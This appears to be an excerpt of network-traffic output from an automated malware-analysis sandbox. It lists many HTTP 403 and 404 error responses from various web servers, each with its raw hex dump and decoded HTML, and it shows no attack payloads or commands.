    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.0.15Date: Sat, 14 May 2022 00:20:13 GMTContent-Type: text/html; charset=utf-8Content-Length: 169Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 30 2e 31 35 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.0.15</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: must-revalidate,no-cache,no-storeContent-Type: text/html;charset=iso-8859-1Content-Length: 334Server: Jetty(9.3.z-SNAPSHOT)Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 32 3e 48 54 54 50 20 45 52 52 4f 52 20 34 30 34 3c 2f 68 32 3e 0a 3c 70 3e 50 72 6f 62 6c 65 6d 20 61 63 63 65 73 73 69 6e 67 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 2e 20 52 65 61 73 6f 6e 3a 0a 3c 70 72 65 3e 20 20 20 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 72 65 3e 3c 2f 70 3e 3c 68 72 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 65 63 6c 69 70 73 65 2e 6f 72 67 2f 6a 65 74 74 79 22 3e 50 6f 77 65 72 65 64 20 62 79 20 4a 65 74 74 79 3a 2f 2f 20 39 2e 33 2e 7a 2d 53 4e 41 50 53 48 4f 54 3c 2f 61 3e 3c 68 72 2f 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="text/html;charset=utf-8"/><title>Error 404 Not Found</title></head><body><h2>HTTP ERROR 404</h2><p>Problem accessing /cgi-bin/ViewLog.asp. Reason:<pre> Not Found</pre></p><hr><a href="http://eclipse.org/jetty">Powered by Jetty:// 9.3.z-SNAPSHOT</a><hr/></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 1050Date: Sat, 14 May 2022 00:20:22 GMT
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: RomPager/4.07 UPnP/1.0
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0Date: Sat, 14 May 2022 00:20:32 GMTContent-Type: text/htmlContent-Length: 169Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 0
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0Date: Sun, 23 May 2021 03:25:16 GMTContent-Type: text/htmlContent-Length: 169Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Sat, 14 May 2022 00:20:44 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundAccess-Control-Allow-Origin: *Access-Control-Allow-Headers: Content-TypeContent-Type: text/htmlContent-Length: 345Date: Sat, 14 May 2022 00:20:43 GMTServer: WebServerData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0Date: Sat, 14 May 2022 00:20:48 GMTContent-Type: text/htmlContent-Length: 169Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Length: 1732Content-Type: text/html; charset=utf-8
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 02:42:19 GMTExpires: Sat, 14 May 2022 02:42:19 GMTContent-Type: text/htmlContent-Encoding: UTF-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 64 69 72 3d 22 6c 74 72 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 20 0d 0a 09 3c 74 69 74 6c 65 3e 46 65 6a 6c 20 34 30 34 20 53 69 64 65 20 69 6b 6b 65 20 66 75 6e 64 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 2f 69 71 34 63 6f 72 65 2e 63 73 73 22 20 2f 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 20 2f 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 2f 6a 71 75 65 72 79 2d 75 69 2e 63 73 73 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2d 75 69 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 77 72 61 70 70 65 72 22 3e 0d 0a 09 3c 21 2d 2d 20 48 65 61 64 65 72 20 2d 2d 3e 0d 0a 09 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 6d 61 73 74 68 65 61 64 22 3e 0d 0a 09 09 09 3c 61 20 69 64 3d 22 68 65 61 64 65 72 4c 6f 67 6f 22 20 68 72 65 66 3d 22 2f 22 3e 3c 21 2d 2d 20 49 51 20 4c 6f 67 6f 20 67 6f 65 73 20 68 65 72 65 20 76 69 61 20 43 53 53 20 2d 2d 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 62 75 69 6c 64 49 6e 66 6f 22 3e 33 2e 34 34 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 0d 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 70 61 67 65 54 69 74 6c 65 22 3e 46 65 6a 6c 20 34 30 34 20 53 69 64 65 20 69 6b 6b 65 20 66 75 6e 64 65 74 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 75 6c 20 69 64 3d 22 6d 61 69 6e 4d 65 6e 75 22 3e 0d 0a 09 09 09 09 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 27 2f 6c 6f 67 69 6e 2e 68 74 6d 27 20
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.0.15Date: Sat, 14 May 2022 00:21:06 GMTContent-Type: text/html; charset=utf-8Content-Length: 169Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 30 2e 31 35 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.0.15</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 03:16:28 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: application/jsonaccess-control-allow-origin: *content-length: 34date: Sat, 14 May 2022 00:21:08 GMTData Raw: 7b 22 63 6f 64 65 22 3a 34 30 34 2c 22 6d 65 73 73 61 67 65 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"code":404,"message":"Not Found"}
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundAccess-Control-Allow-Origin: *Access-Control-Allow-Headers: Content-TypeContent-Type: text/htmlContent-Length: 345Date: Sat, 14 May 2022 00:21:12 GMTServer: WebServerData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0Date: Sat, 14 May 2022 00:21:17 GMTContent-Type: text/htmlContent-Length: 169Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 02:07:40 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: RomPager/4.07 UPnP/1.0
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 14 May 2022 00:21:24 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlX-Frame-Options: SAMEORIGINDate: Sat, 14 May 2022 00:21:38 GMTX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockAccept-Ranges: bytesConnection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 66 66 66 66 66 66 22 3e 0a 20 20 3c 68 32 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 20 20 3c 70 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head> <title>404 Not Found</title></head><body bgcolor="#ffffff"> <h2>404 Not Found</h2> <p></p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 14 May 2022 00:21:24 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: application/json;charset=utf-8Content-Length: 0Server: Jetty(9.1.z-SNAPSHOT)
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html;charset=UTF-8Content-Length: 0Connection: closeCache-control: no-cache
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html;charset=UTF-8Content-Length: 0Connection: closeCache-control: no-cache
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 02:21:31 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
